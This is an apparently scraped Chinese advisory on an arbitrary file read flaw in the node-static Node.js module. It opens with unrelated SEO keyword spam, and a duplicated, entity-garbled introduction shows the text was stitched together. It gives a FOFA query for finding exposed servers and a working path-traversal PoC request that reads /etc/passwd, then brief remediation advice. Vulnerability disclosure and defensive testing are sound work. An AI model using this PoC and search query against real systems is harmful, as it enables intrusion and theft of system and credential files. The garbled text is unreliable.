华为官方网站手机商城首页,网站开发综合实训记录周记,深圳专业营销网站制作,html5新手做的网页0x01 产品简介
node-static 是 Node.js 兼容 RFC 2616的 HTTP 静态文件服务器处理模块#xff0c;提供内置的缓存支持。
0x02 漏洞概述
node-static 存在任意文件读取漏洞#xff0c;攻击者可通过该漏洞读取系统重要文件#xff08;如数据库配置文件、系统配置文件#…0x01 产品简介
node-static 是 Node.js 兼容 RFC 2616的 HTTP 静态文件服务器处理模块提供内置的缓存支持。
0x02 漏洞概述
node-static 存在任意文件读取漏洞攻击者可通过该漏洞读取系统重要文件如数据库配置文件、系统配置文件、数据库配置文件等等导致网站处于极度不安全状态。
0x03 复现环境
FOFAheaderserver: node-static || bannerserver: node-static 0x04 漏洞复现
PoC
GET /../../../../../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip 0x05 修复建议
目前厂商已提供解决方案请关注厂商主页更新https://github.com/cloudhead/node-static
通过防火墙等安全设备设置访问策略设置白名单访问。
如非必要禁止公网访问该系统。